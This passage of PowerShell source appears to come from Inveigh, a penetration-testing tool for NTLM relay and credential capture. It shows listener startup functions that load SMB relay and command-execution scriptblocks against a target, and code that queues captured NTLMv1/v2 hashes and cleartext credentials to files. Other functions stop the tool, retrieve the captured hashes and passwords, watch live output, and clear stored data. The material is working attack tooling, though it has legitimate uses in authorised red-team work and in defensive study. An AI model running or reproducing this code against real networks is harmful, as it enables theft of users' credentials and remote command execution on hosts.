$inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append $inveigh.NTLMv1_file_queue.RemoveAt(0) } while($inveigh.NTLMv2_file_queue.Count -gt 0) { $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append $inveigh.NTLMv2_file_queue.RemoveAt(0) } while($inveigh.cleartext_file_queue.Count -gt 0) { $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append $inveigh.cleartext_file_queue.RemoveAt(0) } } Start-Sleep -m 5 } } # HTTP Listener Startup function function HTTPListener() { $SSL = $False $HTTP_runspace = [RunspaceFactory]::CreateRunspace() $HTTP_runspace.Open() $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) $HTTP_powershell = [PowerShell]::Create() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null $HTTP_powershell.AddScript($irkin_functions_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPIP).AddArgument( $HTTPPort).AddArgument($Target).AddArgument($Command).AddArgument($Usernames).AddArgument( $RelayAutoDisable).AddArgument($WPADAuth).AddArgument($SSL).AddArgument($certificate).AddArgument( $SMB_version).AddArgument($Service) > $null $HTTP_powershell.BeginInvoke() > $null } Start-Sleep -m 50 # HTTPS Listener Startup function function HTTPSListener() { $SSL = $True $HTTPS_runspace = [RunspaceFactory]::CreateRunspace() $HTTPS_runspace.Open() $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) $HTTPS_powershell = [PowerShell]::Create() $HTTPS_powershell.Runspace = $HTTPS_runspace $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null $HTTPS_powershell.AddScript($irkin_functions_scriptblock) > $null $HTTPS_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null $HTTPS_powershell.AddScript($SMB_relay_response_scriptblock) > $null $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPIP).AddArgument( $HTTPSPort).AddArgument($Target).AddArgument($Command).AddArgument($Usernames).AddArgument( $RelayAutoDisable).AddArgument($WPADAuth).AddArgument($SSL).AddArgument($certificate).AddArgument( $SMB_version).AddArgument($Service) > $null $HTTPS_powershell.BeginInvoke() > $null } # Control Relay Startup function function ControlRelayLoop() { $control_relay_runspace = [RunspaceFactory]::CreateRunspace() $control_relay_runspace.Open() $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) $control_relay_powershell = [PowerShell]::Create() $control_relay_powershell.Runspace = $control_relay_runspace $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RunTime) > $null $control_relay_powershell.BeginInvoke() > $null } # HTTP Server Start if($HTTP -eq 'Y') { HTTPListener } # HTTPS Server Start if($HTTPS -eq 'Y') { HTTPSListener } # Control Relay Loop Start if($RunTime -or $inveigh.file_output) { ControlRelayLoop } if($inveigh.console_output) { :console_loop while($inveigh.relay_running -and $inveigh.console_output) { while($inveigh.console_queue.Count -gt 0) { if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) $inveigh.console_queue.RemoveAt(0) } else { switch -wildcard ($inveigh.console_queue[0]) { "* written to *" { if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] } $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } } } } if($inveigh.console_input) { if([Console]::KeyAvailable) { $inveigh.console_output = $false BREAK console_loop } } Start-Sleep -m 5 } } } #End Invoke-InveighRelay function Stop-Inveigh { <# .SYNOPSIS Stop-Inveigh will stop all running Inveigh functions. #> if($inveigh) { if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { if($inveigh.HTTP_listener.IsListening) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } if($inveigh.HTTPS) { $certificate_check = & "netsh" http show sslcert if($certificate_check) { $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port $netsh_arguments = @("http","delete","sslcert",$netsh_ipport) & "netsh" $netsh_arguments > $null } if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete)) { try { $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") $certificate_store.Open('ReadWrite') $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) ForEach($certificate in $certificates) { $certificate_store.Remove($certificate) } $certificate_store.Close() } catch { Write-Output("SSL Certificate Deletion Error - Remove Manually") $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } } } } if($inveigh.unprivileged_running) { $inveigh.unprivileged_running = $false Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append } } if($inveigh.relay_running) { $inveigh.relay_running = $false Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append } } if($inveigh.running) { $inveigh.running = $false Write-Output("Inveigh exited at $(Get-Date -format 's')") $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append } } $inveigh.HTTP = $false $inveigh.HTTPS = $false Start-Sleep -S 5 } else { Write-Output("There are no running Inveigh functions") } } } function Get-Inveigh { <# .SYNOPSIS Get-Inveigh will get stored Inveigh data from memory. .PARAMETER Console Get queued console output. This is also the default if no parameters are set. .PARAMETER Log Get log entries. .PARAMETER NTLMv1 Get captured NTLMv1 challenge/response hashes. .PARAMETER NTLMv1Unique Get the first captured NTLMv1 challenge/response for each unique account. .PARAMETER NTLMv1Usernames Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. .PARAMETER NTLMv2 Get captured NTLMv1 challenge/response hashes. .PARAMETER NTLMv2Unique Get the first captured NTLMv2 challenge/response for each unique account. .PARAMETER NTLMv2Usernames Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. .PARAMETER Cleartext Get captured cleartext credentials. .PARAMETER CleartextUnique Get unique captured cleartext credentials. .PARAMETER Learning Get valid hosts discovered through spoofer learning. #> [CmdletBinding()] param ( [parameter(Mandatory=$false)][Switch]$Console, [parameter(Mandatory=$false)][Switch]$Log, [parameter(Mandatory=$false)][Switch]$NTLMv1, [parameter(Mandatory=$false)][Switch]$NTLMv2, [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, [parameter(Mandatory=$false)][Switch]$Cleartext, [parameter(Mandatory=$false)][Switch]$CleartextUnique, [parameter(Mandatory=$false)][Switch]$Learning, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if($Console -or $PSBoundParameters.Count -eq 0) { while($inveigh.console_queue.Count -gt 0) { if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) $inveigh.console_queue.RemoveAt(0) } else { switch -wildcard ($inveigh.console_queue[0]) { "* written to *" { if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] } $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } } } } } if($Log) { Write-Output $inveigh.log } if($NTLMv1) { Write-Output $inveigh.NTLMv1_list } if($NTLMv1Unique) { $inveigh.NTLMv1_list.Sort() foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) { Write-Output $unique_NTLMv1 } $unique_NTLMv1_account_last = $unique_NTLMv1_account } } if($NTLMv1Usernames) { Write-Output $inveigh.NTLMv2_username_list } if($NTLMv2) { Write-Output $inveigh.NTLMv2_list } if($NTLMv2Unique) { $inveigh.NTLMv2_list.Sort() foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) { Write-Output $unique_NTLMv2 } $unique_NTLMv2_account_last = $unique_NTLMv2_account } } if($NTLMv2Usernames) { Write-Output $inveigh.NTLMv2_username_list } if($Cleartext) { Write-Output $inveigh.cleartext_list } if($CleartextUnique) { Write-Output $inveigh.cleartext_list | Get-Unique } if($Learning) { Write-Output $inveigh.valid_host_list } } function Watch-Inveigh { <# .SYNOPSIS Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. #> if($inveigh.tool -ne 1) { if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { Write-Output "Press any key to stop real time console output" $inveigh.console_output = $true :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { while($inveigh.console_queue.Count -gt 0) { if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) $inveigh.console_queue.RemoveAt(0) } else { switch -wildcard ($inveigh.console_queue[0]) { "* written to *" { if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] } $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } } } } if([Console]::KeyAvailable) { $inveigh.console_output = $false BREAK console_loop } Start-Sleep -m 5 } } else { Write-Output "Inveigh isn't running" } } else { Write-Output "Watch-Inveigh cannot be used with current external tool selection" } } function Clear-Inveigh { <# .SYNOPSIS Clear-Inveigh will clear Inveigh data from memory. #> if($inveigh) { if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) { Remove-Variable inveigh -scope global Write-Output "Inveigh data has been cleared from memory" } else { Write-Output "Run Stop-Inveigh before running Clear-Inveigh" } } }